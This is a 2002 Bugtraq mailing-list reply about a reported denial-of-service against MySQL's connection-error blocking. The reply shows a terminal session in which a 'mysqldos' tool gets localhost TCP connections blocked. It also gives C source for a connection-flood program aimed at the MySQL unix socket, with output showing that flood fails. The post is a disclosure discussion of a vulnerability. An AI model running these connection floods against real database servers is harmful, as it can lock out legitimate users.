[26796] in bugtraq
Re: [luca.ercoli@inwind.it: DoS against mysqld]
daemon@ATHENA.MIT.EDU (Simone Piunno)
Fri Aug 23 16:20:14 2002
Date: Fri, 23 Aug 2002 21:18:34 +0200
From: Simone Piunno <pioppo@ferrara.linux.it>
To: Andreas Gietl <a.gietl@e-admin.de>
Message-ID: <20020823191834.GE2000@ferrara.linux.it>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="X1bOJ3K7DJ5YkBrT"
Content-Disposition: inline
In-Reply-To: <200208231822.29421.a.gietl@e-admin.de>
Errors-To: <pioppo@ferrara.linux.it>
--X1bOJ3K7DJ5YkBrT
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Several people reported that on a typical small shared web server with=20
mysql on localhost, a single user could DoS other co-hosted users, but
they are wrong because you can always connect mysqld on localhost=20
via the unix socket (actually this is the default and the better=20
way... I can't see why someone should prefer TCP).
Proof of concept:
[pioppo@liston pioppo]$ mysql -h 127.0.0.1
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 3.23.47
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> exit
Bye
[pioppo@liston pioppo]$ ./mysqldos -h 127.0.0.1
Sending dos ...............
[pioppo@liston pioppo]$ mysql -h 127.0.0.1
ERROR 1129: Host 'localhost.localdomain' is blocked because of many
connection errors. Unblock with 'mysqladmin flush-hosts'
[pioppo@liston pioppo]$ mysql -h localhost
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 21 to server version: 3.23.47
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
TCP connections from localhost are blocked, but who cares?
Well educated clients don't use TCP to connect to localhost
and the unix socket is not blocked.
Now, can we DoS the unix socket? No
[pioppo@liston pioppo]$ cat mysqlunix.c=20
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#define SOCK "/var/lib/mysql/mysql.sock"
int main(int argc, char *argv[]){
int sk;
int i;
int rc;
struct sockaddr_un sun;
sun.sun_family =3D AF_UNIX;
strcpy(sun.sun_path, SOCK);
printf("Sending dos on the unix socket ");
for (i =3D 0; i < 15; i++) {
sk =3D socket(PF_UNIX, SOCK_STREAM, 0);
if (sk < 0) {
perror("socket");
exit(1);
}
rc =3D connect(sk, (struct sockaddr *)&sun, sizeof(sun));
if (rc < 0) {
perror("connect");
exit(1);
}
printf(".");
close(sk);
}
printf("\n");
return 1;
}
[pioppo@liston pioppo]$ make mysqlunix
cc mysqlunix.c -o mysqlunix
[pioppo@liston pioppo]$ ./mysqlunix=20
Sending dos on the unix socket ...............
[pioppo@liston pioppo]$ mysql -h localhost
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 56 to server version: 3.23.47
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>=20
I think the only real concern is the one proposed by Andreas Gietl:
> The only Situation this can really DOS a service i can imagine is a
> shared hosting-environment with a central mysql-server on a remote
> box.
agreed, but again I can't see anything wrong in this.
Not blocking the offender would cause thread exaustion very soon,
and this would be a much worse problem: a DoS against ALL clients.
--=20
Adde parvum parvo magnus acervus erit.
Simone Piunno, FerraraLUG - http://members.ferrara.linux.it/pioppo
--X1bOJ3K7DJ5YkBrT
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: Per informazioni si veda http://www.gnupg.org
iD8DBQE9ZoqJoM1StIYDFPwRAmlRAJ9qpOLoq9MHVmfkE6lHYv6Znw4YEwCfRWrE
6b+Hp5Nz1YvspoOmLhnulUk=
=xzNF
-----END PGP SIGNATURE-----
--X1bOJ3K7DJ5YkBrT--
